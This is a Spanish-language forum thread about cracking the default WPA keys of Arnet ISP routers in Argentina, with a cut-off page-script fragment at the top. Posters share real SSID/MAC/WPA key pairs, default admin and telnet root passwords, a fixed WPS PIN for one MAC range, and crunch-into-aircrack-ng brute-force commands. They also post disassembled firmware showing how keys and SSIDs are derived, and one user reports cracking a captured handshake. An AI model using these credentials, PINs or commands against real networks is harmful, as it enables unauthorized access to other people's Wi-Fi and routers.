            wlpassword.value=wpaPskKey;
            break;
      }
      print_help_text();
   }
}

-->
      </script>
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fertxt en 26 de Noviembre de 2013, 02:30:34 AM
Te aporto los datos de mi router...
Me hice miembro de la pag solo para seguir este tema asi que espero que no decaiga...

WiFi-Arnet-b693

WPA-PSK:  B369603BF1

MAC:  FC:F5:28:06:51:AB

Espero que les sirva
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 07 de Diciembre de 2013, 01:48:33 PM
Novedades!!!

Actualmente ARNET esta entregando unos nuevos routers (todavia no tengo mucha info sobre los mismos), que poseen los siguientes datos:

ESSID: WiFi-Armet-NNNN (N = Números / No tienen nada que ve con la MAC)
BSSID: 9C:D2:4B:XX:XX:XX
Espacio de BSSID: 9C:D2:4B:00:00:00 - 9C:D2:4B:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WPA2 CCMP PSK
WPS: Activo! 1341XXXX

Actualmente estoy trabajando con una de ellas para saber un poco más sobre el router, el ataque es lento pero por ahora ya tengo los primeros dígitos del WPS, su sistema de bloqueo en realidad no es como otros que se bloquea y no permite el ingreso, este en particular llega a un X cantidad de pruebas fallidas por lo que he visto 3 pruebas y se bloquea por 60seg. luego vuelve a funcionar hasta que desaparece la red en "Linux", en "Windows" se ve perfectamente.

Cuando tenga más información se las estaré pasando.




Con un delay de 15seg. se pueden probar 3 Pins, luego se bloquea por 60seg.
Con un deley de 30seg. se pueden probar más de 10 y no se bloquea. Pero al pasar un tiempo se reciben algunos errores de:

[!] WPS transaction failed (code: 0x03), re-trying las pin




08-12-2013 18:33:

Ataque:
Tiempo: Aproximadamente 75 horas.
Total Completado: 97.49%
Pruebas: 62 seconds/pin.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 08 de Diciembre de 2013, 10:15:12 PM
Bueno novedades!!! al fin termino! el router es un ZTE ZXHN H168N:

(http://wwwen.zte.com.cn/en/products/access/cpe/201111/W020111110359570247684.jpg)

ESSID: WiFi-Armet-NNNN (N = Números / No tienen nada que ve con la MAC)
BSSID: 9C:D2:4B:XX:XX:XX
Espacio de BSSID: 9C:D2:4B:00:00:00 - 9C:D2:4B:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WPA2 CCMP PSK
WPA2: ne89124578 (Por Defecto al seleccionar en la config. tanto para WPA/WPA2)
WPS: Activo! 13419622
IP: 192.168.1.1
Software Versión: ZXHN H168N V1.1.00_TA_11
Hardware Versión: 963168VX-Broadcom
Boot Loader Version: 1.0.38-112.37
Serial Number: 9cd24b790afb
Panel de Administración Avanzado: http://192.168.1.1/admin.html (http://192.168.1.1/admin.html)
Usuario de Ingreso Avanzado: admin
Password de Ingreso Avanzado: CalVxePV1!
Multi-SSID: 4 (Máximo)
Desactivar el WPS: Se puede desactivar desde el Panel de Administración Avanzado (Network > WLAN > WPS)
DDNS: dipc, dyndns y DtDNS
Manual de Configuración Básica de Arnet: Aquí (http://arnetonline.arnet.com.ar/CMEDocuments/ATA/pdf/Manualdeusuario_ZTEH168N.pdf)
Pagina Web del Fabricante: Aquí (http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130205_386413.html).

WPA/WPA2 Radius (Por Defecto al seleccionar en la config.):
Radius Port: 1812
Radius Key: 12345678
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: nicovillafa en 25 de Diciembre de 2013, 09:04:13 PM
Uno de los muchachos participantes de este foro publico esto y en colores les hago ver las similitudes con los datos que aportare mas abajo y ademas como el SSID esta presente en la clave WPA

WiFi-Arnet-b693
WPA-PSK: B369603BF1

Datos aportados por mi con ciertas similitudes

WiFi-Arnet-5b83
WPA-PSK: 5FB8B932E5

Otro dato

WiFi-Arnet-4245
WPA-PSK: 717fdikm2o

D3M0N que no decaiga!!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: powershell en 03 de Enero de 2014, 12:44:53 PM
Tengo un Router ZTE del inquilino anterior. se puede acceder por telnet. se podra encontrar si tiene el algoritmo que genera la clave?
Hay que poner todos estos comandos, usuarios y passwords
# telnet 192.168.1.1
username: root
password: public

>enable
password: zte

#shell
Login: root
Password: root
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 09 de Febrero de 2014, 05:21:57 PM
Bueno últimamente me estoy encontrando con varias redes nuevas pero son WEP  :P  con routers ZTE ZXHN H108N, anteriormente había crackeado un ZTE ZXHN H168N (http://www.arg-wireless.com.ar/index.php?topic=1006.msg5652#msg5652) con WPA atacado por WPS.

ESSID: WiFi-Arnet-??XX (?? = Minusculas - XX = Mayusculas)
BSSID: B4:B3:62:XX:XX:XX
Espacio de BSSID: B4:B3:62:00:00:00 - B4:B3:62:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WEP
WEP: 25199
IP: 192.168.1.1
Software Versión: ZTE ZXHN H108N V3.0.00_TAT26
Hardware Versión: 96328avng
Boot Loader Version: 1.0.37-106.24
Serial Number: b4b3626d877b
Panel de Administración Avanzado: http://192.168.1.1/admin.html (http://192.168.1.1/admin.html)
Usuario de Ingreso Avanzado: admin
Password de Ingreso Avanzado: CalVxePV1!

Pagina de Inicio (No admin):
(http://i.minus.com/iJ25XBdj50cr3.png)

Pagina de Inicio Administrador:
(http://i.minus.com/iim5YwUGZJ4VC.png)

Lamentablemente vía web no se puede configurar nada, ambas paginas sea la normal o la de admin no traen menús ni nada, solo info del hard.

No tiene SSH activo.

Tiene Telnet:

# telnet 192.168.1.1
username: root
password: public

>enable
password: zte

#shell
Login: root
Password: root


Investigando por Telnet, si estaría en WPA-PSK, el pass seria "1851852963", ninguna información sobre WPS, en esta versión de Firmware.

Algunos comandos:
Una vez dentro del busybox podemos manipular cosillas directamente en la DB de la configuración con sendcmd

# sendcmd 1 DB all
nos muestra todas las tablas de configuracion

# sendcmd 1 DB p WLANBase
muestra por ejemplo los datos de la configuración de la Interface inalámbrica

# sendcmd 1 DB set WLANBase 0 Channel 11
cambia el valor del canal (valor channel del row 0 de la tabla WLANBase)

# sendcmd 1 DB save
guarda la configuración.

# reboot
Título: Hackear wifi Arnet
Publicado por: Emma882 en 13 de Marzo de 2014, 04:21:07 PM
Hola Bueno nose si estoy en la zona para preguntar esto...
soy nuevo usuario y de mi parte felicidades por el foro esta espectacular da muchas ganas de aprender..
Mi pregunta es la siguiente... Como puedo sacar la clave de un ruter "Arnet" con incriptacion (Wpa-ccmp) ya hace un tiempo vengo leyendo y poniendo a prueba varios tutoriales pero sin resultado alguno... si alguien me puede ofrecer un tutorial o herramientas la cual puedo usar para hacer esto seria genial... ya que me canse de buscar y hacer pruebas sin llegar a algo por ende me tomo esta medida como ya solucion a tanta buskeda... Espero respuestas pronto muchas gracias  ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 13 de Marzo de 2014, 09:02:28 PM
Hola @Emma882, combino tu tema para que lo veas. En este post esta todo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 20 de Marzo de 2014, 11:28:56 PM
Buenas gente, tengo una nueva red para comentarles, la MAC Address comienza con "E8:43:C1" de la cual se desconoce el fabricante (He probado varios sitios como "http://www.macvendorlookup.com/" y no encontré nada), cuestión muy rara pero bueno ya a futuro sabremos. El SSID de la red es "WiFi-Arnet-NLLL" (N = Numero - L = Letra Minúscula)

Otra más la MAC Address comienza con "64:2D:AB" de la cual se desconoce el fabricante (He probado varios sitios como "http://www.macvendorlookup.com/" y no encontré nada), cuestión muy rara pero bueno ya a futuro sabremos. El SSID de la red es "WiFi-Arnet-LLNL" (N = Numero - L = Letra Minúscula).

Próximamente más info sobre este router.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 24 de Marzo de 2014, 07:49:30 PM
Información sobre las redes nuevas: actualmente no tienen WPS Activo y no se tiene registro de algún patrón en particular.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 03 de Abril de 2014, 07:20:49 AM
Tengo nuevas novedades sobre los nuevos routers que esta entregando Arnet, en este caso la MAC Address comienza con "E8:43:F6" el fabricante es ZyXEL, el router es similar a este:

(http://www.lambda-tek.com/VMG1312-B10A-GB01V1F-ZyXEL-VMG1312-VDSL2-profile-17a-over-POTS-modem-with-4FE-LAN-ports-1-USB-Port-WiFi-802-11n-2x2-CH1-13-IPv6-EU-STD-version~csES/images/img2664978.jpg)

Los datos:

El SSID de la red es "WiFi-Arnet-LNLN" (N = Numero - L = Letra Minúscula)
La Clave WPA aparenta ser Hex. todo en Mayusculas: LNNLLNNNLL (N = Numero - L = Letra Minúscula)

No se cumple lo marcado por @nicovillafa.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: MundoWISP en 03 de Abril de 2014, 02:31:04 PM
Parcialmente se podría hacer fuerza bruta con crunch directo al aircrack, ya que si generan el diccionario tendría 11TB

crunch 10 10 ABCDEF0123456789 hex -o START -t @@@@@@@@@@ | aircrack-ng file-*.cap -e (SSID) -w -

y a su tiempo tendría que salir sin problemas
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 05 de Abril de 2014, 12:43:25 PM
Es impresionante como la gente tiene internet y no se conecta al router.. ajaja, más de 40 horas y no se conecto ningún cliente..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 05 de Abril de 2014, 04:33:17 PM
Novedades.. Novedades.. tengo el apreton de manos de una de las redes y ya esta crackeando con crunch:

crunch 10 10 ABCDEF0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -e (SSID) -w- handshakefile.cap
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 10 de Mayo de 2014, 02:23:47 AM
Justamente en casa se contrato el servicio de Arnet, que para colmo, si a uno se le da la gana, puede cambiar la clave de 10 dígitos alfanumerica que tiene y poner una a gusto, aunque quien sabe quien se tomara la molestía.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Mayo de 2014, 01:27:16 PM
También @hydra pensé lo mismo, pero no toda la gente sabe sobre el asunto.. y bueno, en fin después de 500 horas termine cancelando, son muchas keys...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 14 de Mayo de 2014, 08:44:56 PM
Hola soy nuevo,

alguién me podría proporcionar un firmware de estos routers o a malas un acceso remoto para extraer algunos ficheros necesarios para rebuscar un poco.  ;D  Creo que se donde esconden el algoritmo. Sólo necesito más datos.

Se aprecia cualquier aporte, importante firmware completo para poder reversearlo.

Happy reversing!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Mayo de 2014, 10:54:23 PM
Por el momento creo que no hay...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 15 de Mayo de 2014, 07:31:30 AM
You are not allowed to view links. Register or Login
Por el momento creo que no hay...

¿Y alguien que posea el router fisicamente?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 30 de Mayo de 2014, 06:39:40 AM
Vale creo haber encontrado algo solo para router ADB Broadband Pirelli. Claves WPA alfanuméricas de 10 dígitos.

Necesito datos para corroborarlo, es decir mac-wpa.

Cheers
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 02 de Junio de 2014, 10:06:10 PM
hola les doy los datos de 2 redes de conocidos mios:

ESSID: WiFi-Arnet-LLNL (L=letras N=numeros)
BSSID: 28-28-5D-XX-XX-XX
WPA: igK4eXgimk (la k y la x en mayuscula)
router marca ZyXEL Communications Corporation modelo P-660hnu-t1

ESSID: WiFi-Arnet-NNNN (N=numeros)
BSSID: 74-88-8B-XX-XX-XX
WPA: xte3enpub2
router marca ADB Broadband Argentina S.A. modelo P. DG A4001N

saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 02 de Junio de 2014, 10:08:52 PM
me olvide de decirles el zyxel fue contratado hace 6 meses y el adb poco mas de 1 año.

ojala puedan sacar el patron de estas redes.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 16 de Junio de 2014, 05:08:46 PM
hola soy de misiones ak  esta llena de estas redes wpa de arnet espero que se pueda encontrar un patron yo aporto una algunos datos que recopile la mayoria son moden de la marca ADB modelo PDG A4001N las contrasela son alfanumericas de 10 digitos y tengo un par de contraseñas de amigos que son estas
Nombre de la red WIFI-ARNET-0502  CLAVE :9bfhr4qad9
nombre de la red WIFI-ARNET-4980 CLAVE : bb66bwrq47
espero que sirva de algo este dato, por ahi si se consigue mas contraseñas se podria ver si se encuantra un patron para delimitar la busqueda
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: danonino2003 en 17 de Junio de 2014, 09:41:49 AM
gente me suscribi porque queria dejar mi aporte

(http://imgur.com/dyLcona)

esta como veran termina en 4 letras
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: danonino2003 en 17 de Junio de 2014, 09:45:53 AM
http://imgur.com/dyLcona
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 22 de Junio de 2014, 06:35:03 PM
la verdad q cosa mas rara las wifi-arnet esos password parece aleatorios vaya a saber si guardan logica... ojala alguien pueda sacarlas. saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 27 de Junio de 2014, 04:46:24 PM
Alguien que tenga acceso fisico a un router y pueda trastear con el, que se ponga en contacto conmigo


@diogenes : Gratamente agradecido....
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 28 de Junio de 2014, 09:43:27 PM
You are not allowed to view links. Register or Login
Alguien que tenga acceso fisico a un router y pueda trastear con el, que se ponga en contacto conmigo


@diogenes : Gratamente agradecido....

recien te respondo el mensaje decime en q te puedo ayudar mientras no vaya a romper el router y quedar sin internet! saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 07 de Julio de 2014, 12:57:29 AM
Necesito  la key para routers ADB  con mac A4:52:6F
Para ver si hay algun patron!
Gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 07 de Julio de 2014, 09:32:46 PM
hola yo estube viendo algunos router ABD y no tienen ningun patron entre las mac y las key de dichos routers aabria q buscar otra manera de encontrar algun patron
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 09 de Julio de 2014, 02:07:09 AM
You are not allowed to view links. Register or Login
hola yo estube viendo algunos router ABD y no tienen ningun patron entre las mac y las key de dichos routers aabria q buscar otra manera de encontrar algun patron

OK , pero sabes cuantos letras son ?  solo letras y numeros ?  mayusculas y minusculas ?
estaria bueno pongas algunos ejemplos si contas con esta data!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 09 de Julio de 2014, 04:39:19 PM
hola ya habia dicho la data q tnia pero sebe q nadie miro vuelvo a repetir :
algunos datos que recopile la mayoria son moden de la marca ADB modelo PDG A4001N las contraseña son alfanumericas de 10 digitos
Nombre de la red WIFI-ARNET-0502  CLAVE :9bfhr4qad9
nombre de la red WIFI-ARNET-4980 CLAVE : bb66bwrq47

estas contraseñas entan en minusculas, vi un par mas pero no veo ningun patron se ve que generan de forma aleatorias las contraseñas  habria q ver si alguin tiene algun contacto en arnet si ellos tienen una base d datos o como es la distribucion de los modem a nivel pais capas q se podria ver con el nombbre d la red y si algun aporta otras contraseñas si se puede sacar algun patron, ah no traen activado la seguridad wps  :-X   
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 09 de Julio de 2014, 09:31:09 PM
@mat_1210 como se puede generar un diccionario para esas caracteristicas y cuanto tiempo estipulas lleve  a 400 k/s  dicho diccionario ?
Soy novato por eso pregunto , gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 09 de Julio de 2014, 11:34:09 PM
hola viejo mira lo que estuve leyendo en lo otros aportes de los chicos dicen que llevaria 130 dias en corren yo lo probe con el backtrack con 200kb/s deje las maqina 3 dias y no paso de la letra A proba si qeres con este comando
./crunch 10 10 ABCDEFJHIJKLÑOPQRSTUVWXYZ0123456789 | aircrack-ng -w - nombre de tu archivo.cap -e WIFI-Arnet-xxxx

si tnes backtrack tnes q ir a lon menu y buscas crunch antes tnes q tnes el handshake en la -w va tu archivo .cap q seria cuando capturas elapreton d manos y la -e va el nombre d la red.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 10 de Julio de 2014, 10:27:26 PM
buenas! Sin ningún praton un alfanumerico de 10 digitos tardaria años en ser crackeado por fuerza bruta y mas a esa velocidad de calculo, ni siquiera con GPU utilizando la AMD R9 290x que tiene una velocidad de 14000000 k/s
Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 10 de Julio de 2014, 10:34:08 PM
Se me escapo un cero 1.400.000 k/s! :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 11 de Julio de 2014, 12:24:09 PM
You are not allowed to view links. Register or Login
Se me escapo un cero 1.400.000 k/s! :)

Fuaaaaaaaaa tanto???????????????????

Yo tengo una ati 4870 HD  y me hace 400 ks :S
Tan mala es mi placa :S
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 11 de Julio de 2014, 09:26:11 PM
tenes que usar el oclhashcat o algun otro programa que utilice la GPU, con el crunch estas usando el procesador y es mas lento..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 11 de Julio de 2014, 10:05:27 PM
Aunque la tuya a ser "vieja" como es la serie 4XXX ya no tiene soporte a los ultimos driver, en este caso la versión 14.4 de catalyst que es la que necesitas para correr la ultima version del OclHashcat..
La unica y rebuscada solucion que tenes a eso es utilizar un version anterior del Oclhashcat la cual permita correr la ultima version de driver para tu placa que creo que es la 13.9 y cambiar en la BIOS el año a 2013(Esto por que este programa verifica mediante este metodo que tengas actualizado su programa).-

http://golubev.com/gpuest.htm

En ese link tenes el estimado de varias placas de video.-
Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 16 de Julio de 2014, 02:50:09 PM
Bueno, sigo con esperanzas de encontrar un patrón aquí así que ordené un poco la infomación que tenemos  ;)

(http://k40.kn3.net/6/A/7/E/E/6/C3C.jpg)

Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 16 de Julio de 2014, 10:31:35 PM
You are not allowed to view links. Register or Login
Bueno novedades!!! al fin termino! el router es un ZTE ZXHN H168N:

ESSID: WiFi-Armet-NNNN (N = Números / No tienen nada que ve con la MAC)
BSSID: 9C:D2:4B:XX:XX:XX
Espacio de BSSID: 9C:D2:4B:00:00:00 - 9C:D2:4B:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WPA2 CCMP PSK
WPA2: ne89124578 (Por Defecto al seleccionar en la config. tanto para WPA/WPA2)
WPS: Activo! 13419622
IP: 192.168.1.1
Software Versión: ZXHN H168N V1.1.00_TA_11
Hardware Versión: 963168VX-Broadcom
Boot Loader Version: 1.0.38-112.37
Serial Number: 9cd24b790afb
Panel de Administración Avanzado: http://192.168.1.1/admin.html (http://192.168.1.1/admin.html)
Usuario de Ingreso Avanzado: admin
Password de Ingreso Avanzado: CalVxePV1!
Multi-SSID: 4 (Máximo)
Desactivar el WPS: Se puede desactivar desde el Panel de Administración Avanzado (Network > WLAN > WPS)
DDNS: dipc, dyndns y DtDNS
Manual de Configuración Básica de Arnet: Aquí (http://arnetonline.arnet.com.ar/CMEDocuments/ATA/pdf/Manualdeusuario_ZTEH168N.pdf)
Pagina Web del Fabricante: Aquí (http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130205_386413.html).

WPA/WPA2 Radius (Por Defecto al seleccionar en la config.):
Radius Port: 1812
Radius Key: 12345678

Hola buenas noches, tengo un handshake del mismo router, WiFi-Arnet-NNNN (MAC 9C-D2-4B), tiene wps activo!, cual es el procedimiento de fuerza bruta wps?

Pd: hay algun diccionario (LLNNNNNNNN) o cual seria el comando en crunch?
Desde ya muchas gracias, excelente foro
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Julio de 2014, 11:34:56 PM
@daniel0600: usa el buscador del foro.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 17 de Julio de 2014, 10:38:52 AM
You are not allowed to view links. Register or Login
@daniel0600: usa el buscador del foro.
Te agradezco tu pronta respuesta, pero no eh podido encontrar la solución a mi problema,
adjunto el handshake si alguno me ayuda a pasarle algun diccionario, seria muy agradecido...


HANDSHAKE (https://mega.co.nz/#!QlhjDAwA!ZnvmnmRo4kA_Zsx6yxJEQk2CdfqWQsLJY-AVU3sG-ko)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 17 de Julio de 2014, 11:12:55 AM
You are not allowed to view links. Register or Login
Te agradezco tu pronta respuesta, pero no eh podido encontrar la solución a mi problema,
adjunto el handshake si alguno me ayuda a pasarle algun diccionario, seria muy agradecido...


HANDSHAKE (https://mega.co.nz/#!QlhjDAwA!ZnvmnmRo4kA_Zsx6yxJEQk2CdfqWQsLJY-AVU3sG-ko)


No uses el Hand, usa el WPS. Busca Reaver-WPS, o WPS y te sale toda la información.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 17 de Julio de 2014, 02:09:02 PM
You are not allowed to view links. Register or Login
No uses el Hand, usa el WPS. Busca Reaver-WPS, o WPS y te sale toda la información.
Les agradezco muchisimo, lo Saque con WPS pin (tardo 15 hs), 1341NNNN, la clave wpa 15757535NN
Muy contento, gracias por la colaboración...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: danonino2003 en 21 de Julio de 2014, 07:49:12 PM
Hola, disculpa la ignorancia, como hiciste para forzarlo por wps, te pregunto porque cuando busco wps pin me sale un programa para android y dcon muy malos comentarios.

Yo soy partidarios de que el algoritmo esta plenamente relacionado con la mac y de que dependiendo de como empieze la mac es el algoritmo, pero si por wps es mas facil te pido por favor me expliques.

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: cobrazzi en 26 de Julio de 2014, 08:57:52 PM
You are not allowed to view links. Register or Login
Analizando con mas profundidad podemos determinar que todas las claves WPA son de 10 digitos, mayormente numéricos de 7 a 9 caracteres.




Usuario y Contraseña Nuevos Modems/Routers Arnet (ADB A4001N y ZTE H108N )
Interfaz Arnet: http://192.168.1.1/
Interfaz Real: http://192.168.1.1/admin.html
Usuario: admin
Contraseña: CalVxePV1!

Me tope con algunos routers que si bien la clave por defecto era esa que mencionas otras era solo

admin
arnet

y las claves del wifi

wifi12345 o

arnet12345

no se a que se debe eso pero ya me tope con varios.

les aconsejaria antes de pasar un diccionario prueben esas claves por defecto.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 01 de Agosto de 2014, 02:23:19 PM
Buenas! He descubierto algo interesantísimo!
Las redes de Arnet que tienen el BSSID: 9C:D2:4B:XX:XX:XX
SIEMPRE usan el WPS Pin: 13419622

Saqué 3 con este método.
Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 02 de Agosto de 2014, 04:26:56 AM
@sebabasa: interesante! gracias por el aporte  8)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 02 de Agosto de 2014, 08:28:49 PM
Buen dato, pero la mayoria no viene con WPS activado por defecto en el caso de Arnet :-X Lamentablemente
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 04 de Agosto de 2014, 10:23:36 PM
Al final me pasaron un firmware dumpeado de un Pirelli Arnet. Como otros pirellis el algoritmo encontrado es un SHA256 con la mac, una semilla secreta y quizas el serial.

Al no vivir en Argentina se me complica el asunto de poder seguir con el estudio. Parecen viables para crear una clave directa.


Mandarme privados con datos. Gracias

Os dejo algo que encontré en el firmare


.globl generateKey
generateKey:

var_20= -0x20
var_18= -0x18
var_10= -0x10
var_8= -8
var_4= -4
arg_0=  0
arg_4=  4
arg_8=  8
arg_C=  0xC

la      $gp, aSl_getdslwande  # "sl_getDslWanDevIidStack"
addu    $gp, $t9
addiu   $sp, -0x30
sw      $ra, 0x30+var_4($sp)
sw      $fp, 0x30+var_8($sp)
move    $fp, $sp
sw      $gp, 0x30+var_18($sp)
sw      $a0, 0x30+arg_0($fp)
sw      $a1, 0x30+arg_4($fp)
sw      $a2, 0x30+arg_8($fp)
sw      $a3, 0x30+arg_C($fp)
lw      $a0, 0x30+arg_8($fp)
la      $v0, 0xA0000
addiu   $a1, $v0, (aWl0 - 0xA0000)  # "wl0"
addiu   $v0, $fp, 0x30+var_10
move    $a2, $v0
la      $v0, wlmngr_getPBSHwAddr
move    $t9, $v0
jalr    $t9 ; wlmngr_getPBSHwAddr
nop
lw      $gp, 0x30+var_18($fp)
addiu   $v0, $fp, 0x30+var_10
sw      $v0, 0x30+var_20($sp)
lw      $a0, 0x30+arg_0($fp)
lw      $a1, 0x30+arg_4($fp)
lw      $a2, 0x30+arg_8($fp)
lw      $a3, 0x30+arg_C($fp)
la      $v0, generateKey_from_mac
move    $t9, $v0
jalr    $t9 ; generateKey_from_mac
nop
lw      $gp, 0x30+var_18($fp)
move    $sp, $fp
lw      $ra, 0x30+var_4($sp)
lw      $fp, 0x30+var_8($sp)
addiu   $sp, 0x30
jr      $ra
nop
# End of function generateKey






.globl generateKey_from_mac
generateKey_from_mac:

var_18= -0x18
var_10= -0x10
var_8= -8
var_4= -4
arg_0=  0
arg_4=  4
arg_8=  8
arg_C=  0xC
arg_10=  0x10

la      $gp, (aSDDD+4)
addu    $gp, $t9
addiu   $sp, -0x28
sw      $ra, 0x28+var_4($sp)
sw      $fp, 0x28+var_8($sp)
move    $fp, $sp
sw      $gp, 0x28+var_18($sp)
sw      $a0, 0x28+arg_0($fp)
sw      $a1, 0x28+arg_4($fp)
sw      $a2, 0x28+arg_8($fp)
sw      $a3, 0x28+arg_C($fp)
li      $a0, 0x70  # 'p'
la      $v0, malloc
move    $t9, $v0
jalr    $t9 ; malloc
nop
lw      $gp, 0x28+var_18($fp)
sw      $v0, 0x28+var_10($fp)
lw      $a0, 0x28+var_10($fp)
la      $v0, SHA256_Init
move    $t9, $v0
jalr    $t9 ; SHA256_Init
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
la      $v0, 0xD0000
addiu   $a1, $v0, 0x29E0
li      $a2, 0x20  # ' '
la      $v0, SHA256_Update
move    $t9, $v0
jalr    $t9 ; SHA256_Update
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+arg_C($fp)
la      $v0, strlen
move    $t9, $v0
jalr    $t9 ; strlen
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
lw      $a1, 0x28+arg_C($fp)
move    $a2, $v0
la      $v0, SHA256_Update
move    $t9, $v0
jalr    $t9 ; SHA256_Update
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
lw      $a1, 0x28+arg_10($fp)
li      $a2, 6
la      $v0, SHA256_Update
move    $t9, $v0
jalr    $t9 ; SHA256_Update
nop
lw      $gp, 0x28+var_18($fp)
la      $a0, hash
lw      $a1, 0x28+var_10($fp)
la      $v0, SHA256_Final
move    $t9, $v0
jalr    $t9 ; SHA256_Final
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
la      $v0, free
move    $t9, $v0
jalr    $t9 ; free
nop
lw      $gp, 0x28+var_18($fp)
lw      $v0, 0x28+arg_4($fp)
lw      $v0, 0($v0)
slti    $v0, 0x21  # '!'
bnez    $v0, loc_1D108
nop
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 04 de Agosto de 2014, 10:42:41 PM
Sinos fijamos un poco más, vemos como se generan los ESSIDs
En serio, acepto routers por correo tambien  ;D

Citarglobl createSSIDFromMAC_str
createSSIDFromMAC_str:

addiu   $v0, (aWifiArnet04d - 0xA0000)  # "WiFi-Arnet-%04d"

addiu   $v0, (aIfconfigSVarHw - 0xA0000)  # "ifconfig %s > /var/hwaddr "







.globl createSSIDFromMAC_str
createSSIDFromMAC_str:

var_18= -0x18
var_10= -0x10
var_8= -8
var_4= -4
arg_0=  0
arg_4=  4

la      $gp, (aRutwan_start_2+0x14)
addu    $gp, $t9
addiu   $sp, -0x28
sw      $ra, 0x28+var_4($sp)
sw      $fp, 0x28+var_8($sp)
move    $fp, $sp
sw      $gp, 0x28+var_18($sp)
sw      $a0, 0x28+arg_0($fp)
sw      $a1, 0x28+arg_4($fp)
sw      $zero, 0x28+var_10($fp)
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 2
lbu     $v0, 0($v0)
sll     $v1, $v0, 24
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 3
lbu     $v0, 0($v0)
sll     $v0, 16
or      $v1, $v0
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 4
lbu     $v0, 0($v0)
sll     $v0, 8
or      $v1, $v0
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 5
lbu     $v0, 0($v0)
or      $v0, $v1, $v0
addiu   $v0, 3
li      $v1, 0xD1B71759
multu   $v0, $v1
mfhi    $v1
srl     $a0, $v1, 13
li      $v1, 0x2710
mul     $v1, $a0, $v1
subu    $v0, $v1
sw      $v0, 0x28+var_10($fp)
la      $v0, 0xA0000
addiu   $v0, (aWifiArnet04d - 0xA0000)  # "WiFi-Arnet-%04d"
lw      $a0, 0x28+arg_4($fp)




Citarw      $gp, 0xC8+var_B0($fp)
lw      $a0, 0xC8+arg_0($fp)
la      $a1, ssid
